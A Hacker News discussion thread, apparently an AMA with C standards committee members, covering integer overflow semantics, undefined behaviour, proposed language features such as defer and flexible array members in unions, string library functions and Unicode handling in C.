> A computation involving unsigned operands can never overflow, because a result that cannot be represented by the resulting unsigned integer type is reduced modulo the number that is one greater than the largest value that can be represented by the resulting type. (6.2.5, Types)

Doing the computation in unsigned always does the "right thing"; the thing that one needs to be careful of with this approach is the conversion of the final result back to the desired signed type (which is very easy to get subtly wrong).


A quibble on wording: Unsigned overflow is not "twos-complement". It gives you the same bit patterns that typical two's-complement overflow gives you, but strictly speaking two's-complement is a representation for signed values.


Wrapping around the modulus to me is an "overflow", although maybe the spec doesn't use the word that way


There is also a difference in x86 assembly, and probably others.

For unsigned operations the carry flag is used, and for signed operations, the overflow flag is used.


Most compilers will translate unsigned (x + y < x) to CF usage.


Right, there are (at least) two ways to describe this.

One is that unsigned arithmetic can overflow, and the behavior on overflow is defined to wrap around.

Another is to say that unsigned arithmetic cannot overflow because the result wraps around.

Both correctly describe the way it works; they just use the word "overflow" in different ways.

The C standard chooses the second way of describing it.


And are there standard primitives to do this correctly (signed-unsigned-signed conversion) that never invoke undefined behavior?


Signed to unsigned conversion is fully defined (and does the two's complement thing):

> Otherwise, if the new type is unsigned, the value is converted by repeatedly adding or subtracting one more than the maximum value that can be represented in the new type until the value is in the range of the new type (6.3.1.3 Signed and unsigned integers)

Unsigned to signed is the hard direction. If the result would be positive (i.e. in range for the signed type), then it just works, but if it would be negative, the result is implementation-defined (but note: not undefined). You can further work around this with various constructs that are ugly and verbose, but fully defined and compilers are able to optimize away. For example, `x <= INT_MAX ? (int)x : (int)(x + INT_MIN) + INT_MIN` works if int has a twos-complement representation (finally guaranteed in C2x, and already guaranteed well before then for the intN_t types), and is optimized away entirely by most compilers.


Interesting. I guess most/many arch's overflow flag is set when the sign bit changes and the carry flag when the result rollsover the word size.

I think most people colloquially call going A + 1 = B where B < A an overflow. Interesting. I knew they're different things, but never really thought about my word choice.


Why can't I have flexible array members in union? Consider this:

    struct foo {
        enum { t_char, t_int, t_ptr, /* .. */ } type;
        int count;

        union {
            char c[];
            int i[];
            void *p[];
            /* .. */
        };
    };

This isn't allowed, since flexible array members are only allowed in structs (but the union here is exactly where you'd put a flexible array member if you had only one type to deal with).

Furthermore, you can't work around this by wrapping the union's members in a struct because they must have more than one named member:

    struct foo {
        enum { t_char, t_int, t_ptr } type;
        int count;

        union { /* not allowed! */
            struct { char c[]; };
            struct { int i[]; };
            struct { void *p[]; };
        };
    };
But it's all fine if we either add a useless dummy variable or move some prior member (such as count) into these structs:

    struct foo {
        enum { t_char, t_int, t_ptr } type;
        int count;

        union { /* this works but is silly and redundant */
            struct { int dumb1; char c[]; };
            struct { int dumb2; int i[]; };
            struct { int dumb3; void *p[]; };
        };
    };
Of course, you could have the last member be

    union { char c; int i; void *p; } u[];
but then each element of u is as large as the largest possible member which is wasteful, and u can't be passed to any function that expects to get a normal, tightly packed array of one specific type.


So what do people think about having a feature in the C language akin to the defer statement in GoLang?

The GoLang defer statement defers the execution of a function until the surrounding function returns. The deferred call's arguments are evaluated immediately, but the function call is not executed until the surrounding function returns. It looks like an interesting mechanism for cleaning up resources.


It could be very useful for cleaning resources. I've never used GoLang, but can see how that could be useful in various circumstances. As we're talking about C, I suspect a feature like that, with the potential to make things safer, would also enable the unwary to shoot themselves in the foot more easily.


It sounds like the __attribute__((cleanup(…))) already offered by GCC is similar to this. I probably won't have time to investigate the differences while the AMA is ongoing though.


I personally don't like golang's defer. For me it obscures the flow of the program. For example when I acquire a lock, I like to see where exactly it's released.

For me "defer" only makes sense in the context of exceptions, basically as an equivalent to "finally". This is a slippery slope though, since golang's exceptions are, for a reason, rudimentary.


How about deferring until the surrounding block scope ends? In Go you can get around the limitation of defer only executing at the end of a function by wrapping any arbitrary section of code inside an immediately executed anonymous function. But in C I'm not sure that's possible so maybe one could declare a new block scope instead to control when defer kicks in.


[deleted]


I would love to see defer in the language. It helps keep cleanup code close to the resource that is acquired.

Would the proposed defer statement apply to loops as well? How would one implement such defers without dynamic allocation?


When deciding on the behavior of some operation that maps to hardware [1], how do you weight the existing hardware behaviors?

For example, if all past, current and contemplated hardware behaves in the same way, I assume that the standard will simply enshrine this behavior.

However, what if 99% of hardware behaves one way and 1% another? Do you set the behavior to "undefined" to accommodate the 1%? At what point to you decide that the minority is too small and you'll enshrine the majority behavior even though it disadvantages minority hardware?

---

[1] Famous examples include things like bit shift and integer overflow behavior.


I would say that the committee does pay attention to hardware variations, even when there are no examples of existing hardware that implement a feature (for example, a trap representation for integers other than _Bool). Some of the thinking is that "if it was ever implemented in hardware, it could be again). I'm not crazy about this thinking, and I largely think that language features for which there are no existing hardware implementations should be eliminated and then brought back if needed. However, the C Committee is much smaller than the C++ committee so there is a labor shortage. More people getting involved would certainly help.

We have dropped support for sign and magnitude and one's complement architectures from C2x (a decision Doug Gwyn does not agree with). There was some concern that Unisys may still use a one's complement architecture, but that this may only be in emulation nowadays.


Some example of hardware variation (since you mentioned shifting and overflow):

- signed integer overflow or division by zero occurs, a division instruction traps on x86, while it silently produces an undefined result on PowerPC - left-shifting a 32-bit one by 32 bits yields 0 on ARM and PowerPC, but 1 on x86; - left-shifting a 32-bit one by 64 bits yields 0 on ARM, but 1 on x86 and PowerPC


On x86 it's actually mixed: scalar shifts behave as you describe, but vectorised logical shifts flush to zero when the shift amount is greater than the element size!

So x86 actually has both behaviors in one box (three behaviors if you could the 32-bit and 64-bit scalar things you mentioned separately).

This is an example of where UB for simple operations actually helps even on a single hardware platform: it allows efficient vectorization.


A good example might be 1's complement signed integers. They were dead weight in the standard for a long time.


Yes, but that is a slightly different question: how long you do you keep something in the standard after all the relevant hardware has disappeared, e.g,. is there a framework for periodically re-evaluating decisions in light of the changing hardware landscape.

My question was more about when behavior is being defined for the first time, which admittedly doesn't happen that often (but it could apply e.g., when thing fixed-width integer types, uintX_t and friends were introduced).


Original standard feature specifications were not meant to obtain a 1-to-1 map from C onto hardware, but we used practical experience to judge what overhead was acceptable for the kinds of processors we had seen or thought were reasonable choices that the architects might make in the not too distant future. If a frequently-executed action had to (for example) check for a special condition every time, the overhead might increase by several percent, depending on the instruction set architecture. So quite often we argued that "if the programmer wants to test for that condition, he can do so, but typically it is a waste of cycles". There are a lot of such trade-offs; maybe we should write a paper or book on this topic.


As a C newbie, will there ever be "safe" C, i.e. no undefined behavior and help with writing code that has less memory related crashes/bugs? For comparison, Rust has the `unsafe { }' block which lets you mark regions of code as being able to do funky stuff. Could we get the opposite for C, i.e. `safe { }' and for an entire file, `#pragma safe'?

I have a love-hate relationship with C - I like it for small projects, but anything serious I really need to write it in a more safe language. I think GCC has some flags that can help, and I've been using tools like splint, but something baked into the standard would be amazing.


I'm pretty happy with C as it is, but I will admit to being surprised that a "minimalistic Rust" hasn't risen to prominence.

I guess what I mean by that is a language that has Rust's hyperactive, strongly opinionated compiler, borrow checker, no NULL, immutable by default, etc, but in a language that is no more syntactically ambitious that C89. I would be way more into a language like that than Rust.

A language that sort of feels like Go, but can actually be used for low-level systems programming.


I think it's going to arrive, but some time is needed to see what works in Rust or not. D is going this way as well, so should provide another data point.


Is the committee planning on working on the preprocessor? I don't see any reason for not boosting it. It's time for C to have real meta-programming. Would be nice to have local macros that are scoped.

On another note:

- Official support for __attribute__

- void pointers should offset the same size as char pointers.

- typeof (can't stress this one enough)

- __VA_OPT__

- inline assembly

- range designated initializer for arrays

- some GCC/Clang builtins

- for-loop once (Same as for loop, but doesn't loop)

Finally, stop putting C++ craps into C.


+1 for Modern Metaprogramming.

I know some people are against metaprogramming because they believe the abstractions hide the intrinsic of how the underlying code will execute, but I would love to write substantial tests in C without relying on FFI to Python or C++ to perform property-based testing, complex fuzzing, and whatever. I feel metaprogramming would be a huge boon for C tooling and developer productivity.


In my point of view, there's a difference between abstraction created by the language, e.g. lambdas or virtual table in C++, and abstraction created by the programmers via the CPP.

The former is compiler dependent and you cannot know how it's implemented. The former is simple text substitution and you're the one implementing it. I often find myself creating small embedded languages in CPP for making abstraction, and I know exactly what C code it's going to generate and thus the penalty if there's any.

People that are afraid of the preprocessor simply don't understand how powerful it's in good hands.


Does the committee have plans to deprecate (as in: give compiler license to complain suchthat compiler developers can appeal to yhe standard when users complain back) locale-sensitive functions like isdigit, which is useless for processing protocol syntax, because it is locale-sensitive, and useless for processing natural-language text, because it examines only one UTF-8 codw unit?


isdigit is likely to remain, because much existing code does use it (perhaps in different contexts from the one you cited). If you need a different function specification to do something different, it could be added in a future release, but that doesn't mean that we need to force programmers to change their existing code.


What about giving isdigit and friends defined behavior for any argument value that's within the range of any of char, signed char, or unsigned char?

The background (I know Doug knows this): isdigit() takes an argument of type int, which is required to be either within the range of unsigned char, or have the value EOF (required to be negative, typically -1).

The problem: plain char is often signed, typically with a range of -128..+127. You might have a negative char value in a string -- but passing any negative value other than EOF to isdigit() has undefined behavior. Thus to use isdigit() safely on arbitrary data, you have to cast the argument to unsigned char:

    if (isdigit((unsigned char)s[i])) ...
A lot of C programmers aren't aware of this and will pass arbitrary char values to isdigit() and friends -- which works fine most of the time, but risks going kaboom.

Changing this could raise issues if -1 is a valid character value and also the value of EOF, but practically speaking -1 or 0xff will almost never be a digit in any real-world character set. (It's ÿ in Unicode and Latin-1, which might cause problems for islower and isalnum.)


This proposal is very difficult to implement because it will cause ABI breakage due to the way the isdigit() macro (and its friends) expose the representation of the ctype internals


I remember that the various is* man pages noted that most of them are only defined if isascii() is true. So I always used e.g. (isascii(x) && ispunct())

FWIW, just looked at the man page (macos) and iswdigit() and isnumber() are mentioned.


isascii() is not defined by ISO C. (It is defined by POSIX, but POSIX says it may be removed in a future version.)

I see that POSIX explicitly says that isascii(x) is "defined on all integer values" (it should have said "all int values").

Personally I'd rather cast to unsigned char.


Does there exist a use case in portable code such that use of isdigit is not a bug?

How does the committee view non-portable existing code generally when considering changes?


Code can be non-portable for various reasons, not all of them bad. I just grepped a recent release of DWB and found about 100 uses of isdigit, most of which were not input from random text but rather were used internally, such as "register" names (limited to a specified range). Other packages are likely to have similar usage patterns. I really don't want to have to edit that code just for aesthetics.


C11 has seen new features, such as Generic Selection. Is the current language standardization converging (just adding clarifications, removing the surface for undefined behavior, etc.) or is C still growing with new features?

In other words, will the C standard be effectively “done” at some time in the future?


Fixing minor bugs or inconsistencies and reducing the number and kinds of instances of undefined behavior are some of the efforts keeping the C committee busy.

Reviewing proposals to incorporate features supported by common implementations is another.

Aligning with other standards (e.g., floating point) and improving compatibility with others (C++) is yet another.

In general, when an ISO standard is done it essentially becomes dead. So for the C standard to continue to be active (on ISO's books) it needs to evolve.


It's interesting to hear the standardization perspective, because it's pretty much the opposite of my perspective as a user.

I see the classic path of any programming language -- regardless of standardization -- is to continuously add features until it's too big and complex that nobody wants to deal with it any more. Then it's replaced by a newer, simpler language that takes the important bits and drops the unnecessary complexities. At that point, everybody sees that the older language was barking up the wrong tree, and they stop wasting time on it.

It's not the cessation of language change that causes language death -- that's merely a symptom. You can't keep a language alive simply by changing it every year. Some people sure have tried.

Alternatively, until it's evolved so much that there is so much diversity of implementation that simply knowing a library is written in "language X" doesn't tell me much about how it's written, or whether I can use it in my program which is also written in "language X".

Then again, C is the exception to every rule, so maybe we can keep piling on features indefinitely, and people will have to use it (even if they don't like it), for the same reason they started using it decades ago (even if we didn't like it).


I would say no, that we are still adding new features. Aaron Ballman was responsible for adding attributes to the C2x (he can tell you more). We're also looking at #embed feature to incorporate binaries the way that #include incorporates text.


A full list of proposals to WG14 can be found here:

http://www.open-std.org/jtc1/sc22/wg14/www/wg14_document_log...

These papers are usually quite interesting.


Some random thoughts:

I appreciate the original simplicity of K & R, "The C Programming Language", 2nd Edition, and the relatively simple semantics of ANSI C89/ISO C90 compared to C99 and later.

You don't need complex parsing methods for ANSI C89/ISO C90 and you do not need the "lexer hack" to handle the typedef-name versus other "ordinary identifier" ambiguity.

A surprising number of colleges still teach K & R 2nd Edition C.

Whenever someone brags about using recursive-descent parsing methods, I always ask, are they using predictive, top-down parsing, or back-tracking?

I hope C never loses sight of it's roots nor morphs into C++ under the guise of creating a common subset, but which is really a disguised superset of C and C++

Please prevent the ever increasing demand for new features from overwhelming C's simplicity so it can no longer be parsed with simple methods.


Is there a possibility there will be introduced a new rule saying "if the compiler detects an UB it should abort the compilation instead of breaking the code in the most incomprehensible way possible"?

Right now it's just scary to start a new project in C. It would be really great if there was more emphasis on correctness of the produced code instead of the insane optimizations.


This can only be done at compile time in very specific cases. The huge problem here is the compiler has no way of knowing which cases of undefined behavior are bugs in the program and which cases of undefined behavior are just examples of unreachable code. If the compiler aborted compilation when it detected undefined behavior, you’d be getting a lot of false positives for unreachable code, and you’d need to solve that problem (figuring out how to generate sensible errors and suppress them). This is not even remotely easy.

If you are concerned about safety there are ways to achieve that, like using MISRA C, formally verifying your C, or by writing another language like Rust.


Good point, but could it not be required that the unreachable code would be annotated to be unreachable? It could even have a (development only) assertion in the location.


That would be an immense undertaking. It’s not really just that some statement or expression is unreachable (we have __builtin_unreachable() in GCC for stuff like that) but that certain states are unreachable.

For example,

    int buffer_len(struct buffer *buf) {
        return buf->end - buf->start;
    }
There are at least three states that trigger undefined behavior: buf is not a valid pointer, buf->end - buf->start doesn’t fit in int, and buf->end and buf->start don't point to the same object.

I’m not sure how you would annotate this. At the function call site, you would somehow need to show that buf is a valid pointer, and that start/end point to same object and the difference fits in an int. It would start looking more like Coq or Agda than C.

Honestly, I think if you really want this kind of safety, your options are to use formal methods or switch to a different language.

There’s also this weird assumption here that the compiler detects undefined behavior in your program and then mangles it. It’s really the opposite—the compiler assumes that there is no undefined behavior in your program, and optimizes accordingly. In practice you can turn optimizations off and get something much closer to the “machine model” of C (which doesn’t really exist anyway) but most people hate it because their code is too slow.


Thanks, so it's definitely easier said than done! Good explanation.


> If the compiler aborted compilation when it detected undefined behavior, you’d be getting a lot of false positives for unreachable code

Could you please provide an example of this?


Overflow of signed integers is undefined.

    int add(int a, int b) { return a + b; }
Unless the compiler can prove that `add` is never called with a and b values resulting in an overflow, this code can lead to UB, and, under your rules, the compilation aborts.


It would be wonderful (IMO) if we could get to that point, but that would leave implementations with too great of a burden because many forms of UB can only be caught at runtime (without a considerable number of false positives). Generally, the C committee makes things a "constraint violation" (aka, we would like implementations to err) whenever something can be caught at compile time, and we leave the undefined behavior hammer for scenarios where there is not a reasonable alternative.

Thankfully, there are a lot of tools to help developers catch UB these days (UBSan, static analyzers, valgrind, etc). I would recommend using those tools whenever starting a new project in C (or C++, for that matter).


  int i;
  […]
  i += 1;
potentially is undefined behavior; i could overflow.

Compilers nowadays are fairly good at warning about definite undefined behavior.

I don’t think anybody would be happy with a compiler that aborted on all potential undefined behavior. That would (almost) be equivalent to banning the use of all signed ints.


Some implementations have been making a lot of effort to do just that. GCC in particular has been adding these types of checks (either as warnings or sanitizers) in recent years and although there is still much to improve I'd like to think we have made good progress.

Adding a rule requiring implementations to error out in cases of undefined behavior would be hard to specify in the standard. It could (and in my view should) be done by providing non-normative encouragement as "Recommended Practice."


Try using "lint" or other code checkers.


Can you please repeat this AMA at a later date and at a time of day when people on the west coast of the USA are awake? Alternatively, please keep it going for a few hours if you would be able to be so generous with your time! Thank you for doing this!

Do you also answer questions about the standard libraries? This is not so much a C question as a library question:

I'm wondering if Apple's Grand Central Dispatch ever made it into a more integrated role in C's libraries, or if it will forever remain an outside add-on. And whether there is anything else at that level (level in the sense of high versus low level) in the standard libraries that plays such a role, that I should read up on instead of GCD.


> Alternatively, please keep it going for a few hours if you would be able to be so generous with your time!

We're remaining active while there are still people asking questions, so the west coast folks should hopefully have the chance to ask what they'd like.

> Do you also answer questions about the standard libraries?

Sure!

> I'm wondering if Apple's Grand Central Dispatch ever made it into a more integrated role in C's libraries, or if it will forever remain an outside add-on.

GCD has not been adopted into C yet, and I don't believe it's even been proposed to do so by anyone (or an alternative to GCD, either).

It would be an interesting proposal to see fleshed out for the committee, and there is a lot of implementation experience with the feature, so I think the committee would consider it more carefully than an inventive proposal with no real-world field experience.


GCD relies on Blocks (closures) for ergonomics, and Blocks have been proposed to WG14, for example N1451: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1451.pdf


What has been the rationale or hinderance for not adding locale-independent versions of various stdlib functions?

Practically every second C codebase on earth has their own implementations of these at some point, and it remains a huge problem for e.g. writers of libraries, where you don't know how/where your library will be used.


First, there needs to be a proposal for adding a feature (I'm not aware of one having been submitted recently). Second, any non-trivial proposed feature needs to have some existing user experience behind it. For libraries that typically means implementations shipping with operating systems or compilers (but successful third party libraries might also be considered). Finally, it also needs to appeal to people on the committee; that can be quite challenging as well. Many proposals that meet the first two criteria die because they simply don't get enough support within the committee.


Sounds mostly like the issue is nobody has bothered to submit a proposal for it then? (There is so much in-the-wild experience and code dealing with this issue, I cannot imagine the second point being problematic.)

On the third point, I have trouble thinking of any technical objections to such proposal.


To clarify, do you mean functions like c_isalpha (part of Gnulib) which is like isalpha but only matches 7 bit ASCII characters?


An easy (and problematic) example is decimal separators (radix characters) being parsed or written differently based on locale.


There's a compiler attribute in GCC to promise that a function is pure, i.e. free from side effects and only uses its inputs.

This is useful for parallel computations, optimizations and readability, e.g.

   sum += f(2);
   sum += f(2);
can be optimized to

   x = f(2);
   sum += x;
   sum += x;
Would the current motto of the consortium forbid adding a feature such as marking a function as pure, that would not just promise, but also enforce that no side effects are caused (only local reads/writes, only pure functions may be called), and no inputs except for the function arguments are used?


No enforcing! This is useful even when it's, strictly speaking, a lie.

Suppose I want to add some debug tracing into f():

   f.c: 42: f entered
   f:c: 43: returning 2
that's a side effect, right? But now the pure attribute tells a lie. Never mind though; I don't care that some calls to f are "wrongly" optimized away; I want the tracing for the ones that aren't.

In C++ there are similar situations involving temporary objects: there is a freedom to elide temporary objects even if the constructors and destructors have effects.

Even a perfectly pure function can have a side effect, namely this one: triggering a debugger to stop on a breakpoint set in that function!

If a call to f(2) is elided from some code, then that code will no longer hit the breakpoint set on f.

Side effect is all P.O.V. based: to declare something to be effect-free in a conventional digital machine, you have to first categorize certain effects as not counting.


Such attributes would be most useful if the semantics were that any time after a program receives inputs that would cause a "pure" function to be called with certain arguments, a compiler may at its leisure call the function with those arguments as many or as few times as it sees fit.

The notion that "Undefined Behavior" is good for optimization is misguided and dangerous. What is good for optimization is having semantics that are loose enough to give the compiler flexibility in how it processes things, but tight enough to meet application requirements.

Instead of saying that compilers can do anything they want when their assumptions are violated, it would be far more useful to recognize what they are allowed to do on the basis of certain assumptions. For example, given a piece of code:

    long long test1(long long x, int mode)
    {
      while(x)
        x = slow_function_no_side_effects(x);
      return x;
    }

    void long test2(long long x, int mode)
    {
      x = test1(x);
      if (!mode)
        x=0;
      doSomething(x);
    }
It would generally be useful and safe to allow a compiler that determines that no individual action performed by "test1()" could have any side effects may omit the call to "test1()" if its value never ends up being used, without having to prove that the slow function with no side effects will eventually return zero. It is likewise useful and safe to say that if the generated code observes either that the loop exits or that "mode" is zero, it may replace the call "doSomething(x)" with "doSomething(0)". The fact that both optimizations would be safe and useful individually, however, does not imply that it would be safe and useful to allow compilers to change the code for "test2()" so that it calls "doSomething(0)" or otherwise allow code to observe that the value of "x" is zero when mode is non-zero, without regard for whether "test1()" would complete.


> flatfinger

https://news.ycombinator.com/user?id=supercat

?

If you contact the HN gods maybe there is a way to recover access to that account.


Just offer a -Wpure flag for checking if functions are pure. That way production/test releases can check while you can still use it for debugging.

Also, the problem with eliding breakpoints already exists afaik, since the compilers already check for pure functions.


If you wrote down your proposal, which the C committee member Robert Seacord is encouraging you to do here: https://news.ycombinator.com/item?id=22870210 , you would have to think carefully about functions that are pure according to your definition (free from side effects and only uses its inputs) but do not terminate for some inputs.

There is at least one incorrect optimization present in Clang because of this (function that has no side-effects detected as pure, and call to that function omitted from a caller on this basis, when in fact the function may not terminate).


I thought the compiler was free to pretend loops without side effects always terminate, and in that sense it is already a "correct" optimization? Or is it only for C++, I'm not sure?


That may be the case in C++, but in C infinite loops are allowed as long as the controlling condition is a constant expression (making it clear that the developper intends an infinite loop). These infinite loops without side-effects are even useful from time to time in embedded software, so it was natural for the committee to allow them: https://port70.net/~nsz/c/c11/n1570.html#6.8.5p6

And you now have all the details of the Clang bug, by the way: write an infinite loop without side-effects in a C function, then call the function from another C function, without using its result.


sum = 2*f(2) seems nicer than having sum= twice.

If you were enforcing this with the compiler, you would also need something that would suppress the enforcing, because the millions of pre-existing functions would probably not get an updated attribute marking it as pure. And once you do that, the compiler can't really trust anything that function does, because it may actually be calling a non-pure function.


When you're looking at an unfamiliar C code base for the first time, how do you approach it? Which files do you look for? Which tools to you open up immediately?


This depends a bunch on what your goals are. There are no specially named files, so looking for a particular filename is not particularly useful. It is sometimes informative to find the file containing the main, but not always.

My job at NCC Group involves a lot of code reviews, so frequently the files that are of interest to me are the ones that contain the most defects. I typically identify these by compiling with compiler warnings turned up and warning suppression turned down. I'll frequently also make use of static and dynamic analysis, including the GCC and Clang sanitizers.


It all depends on how organized previous workers were, and what your goal is for a modification of the source text. Often, headers (dot-h files) document the data structures and interfaces.


I start with generating tags.

  exctags --exclude=TAGS --exclude=TAGS.NEW --append -R -f TAGS.NEW --sort=yes  && mv TAGS.NEW TAGS
My editor (vim) has native support for quickly jumping from a use to definition via this TAGS index. History is preserved (i.e., there is a "back" button), so you can quickly dive through 5 layers of API and back out to understand where a value went. It is quite useful for starting with what you know and following it to the surprising behavior, without executing the code.


cscope can help


Is there a vim-style cscope interface for emacs? I hate that xcscope brings up its own persistent buffers (replacing other buffers that I had deliberately placed on the screen). Vim, conveniently, just pops up the cscope interface when I need to enter some input, and then hides it away. Also I don't think xcscope works with evil's tag stack whereas in vim, I believe, you can just return to where you were with ^T, whether using ctags or cscope.


Yes, I have found it helpful. One nice feature is that it uses a character-terminal interface, not a platform-specific GUI.


Could we have variadic macros with zero arguments in the standard? I'm not using any compiler that doesn't allow it.


The C standard description does not allow a function that does not have at least one normal argument before the variadic arguments.

Conceptually, something must indicate to the function how many arguments it is supposed to request next, and with what types. Yes, you could write a function where this information is passed through a static-lifetime variable, but in practice the first mandatory argument is almost always used for that anyway.


You’re replying to a comment about macros, not about functions.


A couple of (I hope easy) requests - 1. Can we add separators in constants (C++ does 0xFFFF'FFFF'FFFF'FFFF any other reasonable scheme is fine too?)

2. I think many compilers already do this, but can the static initialization rules be relaxed a bit?

  static const int a = 0;
  static const int b = a; /* This is not standard C afaik. */
Thank you, CodeandC


WG14 in general looks favorably at proposals to align C more closely with C++ (within the overall spirit of the language) and I'd expect (1) would viewed in that light.

I'd also say there is consensus that (2) would be beneficial. There are some good ideas in http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2067.pdf although I don't think repurposing the register keyword for it was very popular. Not just because it wouldn't be compatible with C++ which deprecated register some time ago, but also because it's novel with no implementation or user experience behind it. My impression that this is waiting for a new proposal.


A binary literal would be nice too. Doing masks for embedded systems makes my head hurt sometimes. "Cpp compatibility" etc etc could be the excuse to implement it.


What's up with `strlcpy` and `strlcat`? Are they getting standardized?


We've been considering proposals to add common POSIX APIs into C, but I don't believe we've seen a proposal for strlcpy or strlcat yet. I recall we agreed to add strdup to C given its wide availability and usage.


There are deficiencies in almost all proposals. Two new functions which avoid the problems are supposed to be published in C202x: strcasecmp and strncasecmp, added in header strings.h (note: not string.h).


strdup seems like a perfect example of "standardizing existing practice." And it has never struck me as running against the spirit of C.


In fact I proposed strdup on a few occasions, but it wasn't adopted. It seems that they didn't like for standard library functions to use malloc. POSIX.1 specifies strdup.


No one has proposed making these standard. I doubt they would gain much support as they are similar to the Annex K Bounds Checked Interface functions strcpy_s and strcat_s but not quite as good IMHO.


There were a number of recent proposals to adopt various POSIX functions by Martin Sebor into C including:

  N2353 2019/03/17 Sebor, Add strdup and strndup to C2X
  N2352 2019/03/17 Sebor, Add stpcpy, and stpncpy to C2X
  N2351 2019/03/17 Sebor, Add strnlen to C2X
He is lurking on this thread as well. These proposals can all be found in the document log at http://www.open-std.org/jtc1/sc22/wg14/www/wg14_document_log...


The results (from the minutes http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2377.pdf)

6.33 Sebor, Add strnlen to C2X [N 2351] Result: No consensus on putting N2351 into C2X.

6.34 Sebor, Add stpcpy, and stpncpy to C2X [N 2352] Result: No consensus to put N2352 into C2X.

6.35 Sebor, Add strdup and strndup to C2X [N 2353] Result: N2353 be put into C2X. The committee wants a proposal for the wide character versions of any POSIX functions voted in this meeting.


There have been some disagreements on strlcpy/strlcat (BSD vs glibc crowd), although by now the debate has died off and these functions are pretty widely used. Also, while here, it would be lovely to have strchrnul() included.


glibc still refuses to add the functions because they are not required by a standard.


> similar to the Annex K Bounds Checked Interface functions strcpy_s and strcat_s but not quite as good IMHO.

Err... I thought Annex K is deprecated and dead? Whereas strl* seem very much alive, some compilers even give a "strcpy/strncpy is unsafe, use strlcpy instead" warning.


FWIW, Annex K is not currently deprecated.


It's not commonly available though, e.g. on Linux/BSD systems...


Correct -- it would be nice if the glibc maintainers would reconsider their opinion of supporting the optional Annex K functionality. There is definitely user demand for the feature.


> rseacord 22 minutes ago [-]

> The C Committee has taken two votes on this, and in each case, the committee has been equally divided. Without a consensus to change the standard, the status quo wins.

The fact that it has only survived on status quo is a pretty crass hint that things aren't well with Annex K.


And every BSD out there. And whatever it is that macOS does. Microsoft looks to be the outlier to me.


Microsoft does not even implement Annex K.

> Microsoft Visual Studio implements an early version of the APIs. However, the implementation is incomplete and conforms neither to C11 nor to the original TR 24731-1.

> As a result of the numerous deviations from the specification the Microsoft implementation cannot be considered conforming or portable.

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1967.htm


macOS is POSIX compliant.


It should be.


Well, I am informally proposing making those standard :-).

IMO they're a lot more ergonomic than the Annex K functions, and do the thing most programmers think the strncat/strncpy functions do (admittedly, not part of ISO C).

Annex K should be forgotten as the mistake it is and we can move on with existing real-world interfaces instead of inventing features from whole-cloth. I thought that was generally the C standard operating practice.


I disagree, because they return a value that nobody really wants and thus perform poorly: https://saagarjha.com/blog/2020/04/12/designing-a-better-str...


So standardize them as returning void — great!


What you really want is it to tell you how much it copied.


I don't think I've ever wanted to know that, actually. Void is totally fine for my use.


I hope not, they perform much worse than they need to :(


It is 2020. You are looking at a series of projects your company has teed up. All are greenfield efforts - no legacy. What would be the attributes of a project that would have you recommend C as the programming language?


For anything embedded you have practically no choice but to use C (or assembly). Same goes for a lot of systems programming, e.g. writing Linux drivers.


Anything high performance: game engine, scientific computation, deep packet inspection, image analysis, machine learning, rendering engines, high frequency trading.... The list is long!


AFAIK, few seem to choose C for game engines or rendering engines. Not familiar with the other domains.


As there are a lot of C-masters lurking in this thread:

How can one process unicode (UTF-8) properly in C? As a CJK person, I wish there was a robust solution. Are there any standardized ways or proposals? (Using wchar doesn't count.)


Ignore all character support in the standard library and handle UTF-8 as opaque binary buffers. If you need complex string algorithms, decode into UCS-4 (UTF-32). You'll find short encoding and decoding functions on StackOverflow. For case-insensitive comparisons and sorting, use an external library that knows the latest Unicode standard.


Except that not all binary data is valid UTF-8 so you also need functions that check if a binary buffer is valid UTF-8.


The decoding phase will do that, if needed. Also note that in many cases you must process it as opaque binary, even though it should be valid UTF-8. This is in particular with filenames on POSIX systems because otherwise you could not access any files that happen to have invalid UTF-8 in their names.


UTF-8 encoding works "as is" based on byte strings (char[]). The latest versions of the draft standard provide somewhat more support.

I recommend heading toward a future where only UTF-8 encoding is used for multibyte characters and UCS-2 or similar for wchar_t. There is no need to support several different encodings.


Aaron Ballman even got a u8 character prefix added to C2x:

N2198 2018/01/02 Ballman, Adding the u8 character prefix

http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2198.pdf


UCS-2 is a bad choice -- it fails to represent most unicode characters. If you meant UTF-16, that's also a bad choice, because UTF-16 is also a variable width encoding, forcing programmers to use a some for of "extra-wide char".

I'm of the opinion that wchar_t should become an alias for char32_t.


Yes, I meant the 31-bit code point value (more than 16, anyway). It is the most useful width for doing things with wide characters.


UTF-32 is also a variable-width encoding; eg 00000044 00000308 aka "D̈".


I thought it was strictly one character per 32-bit code. Anyway, whatever it is called it is what wchar_t should be.


There are no fixed width encodings with range of encodable characters anywhere near that of Unicode.


It's too bad Unicode wasn't designed around the concept of easily-recognizable grapheme clusters and "write-only" [non-round-trip] forms that are normalized in various ways. A text layout engine shouldn't have to have detailed knowledge of rules that are constantly subject to change, but if there were a standard representation for a Unicode string where all grapheme clusters are marked and everything is listed in left-to-right order, and an OS function was available to convert a Unicode string into such a form, a text-layout using that OS routine would be able to accommodate future additions to the character set and and glyph-joining rules without having to know anything about them.


You can't do that without commiting to not supporting pathological text, otherwise you're stuck adding new special cases to the layout engine every update anyway.

I do have some ideas for a better encoding (like, I assume, anyone competent with sufficient free time and interest in text encoding), but there's a lot of reluctance to put effort into something that's already completely eclipsed by a technically inferior but not completely unusable alternative, so I've had it mostly shelved.


Check this: http://utf8everywhere.org/

Basically store the text as char arrays, and convert them when needed. Meanwhile, you could use this single file header: https://github.com/RandyGaul/cute_headers/blob/master/cute_u...


As a reviewer for Robert's upcoming C book “Effective C”, I thought that this aspect was better covered than in existing manuals for learning C.

However, the book only describes the available standard functions, so even doing better than other manuals, everything it has to say on this subject fits in one chapter and feel underpowered.


Your best bet is probably to use a library like ICU.

Here are examples of working with unicode in C: https://begriffs.com/posts/2019-05-23-unicode-icu.html



What sort of processing do you want to do?


Any plans to add semantics for exceptional situations such as divide by zero and dereferencing a null pointer? https://blog.regehr.org/archives/232

Or incorporating features from this 14 item list? https://blog.regehr.org/archives/1180

As it appears these have failed: https://blog.regehr.org/archives/1287


I don't know of any plans to add semantics for divide-by-zero of dereferencing a null pointer. I'm guessing this is not viable because there is no agreed upon semantics among different implementations.

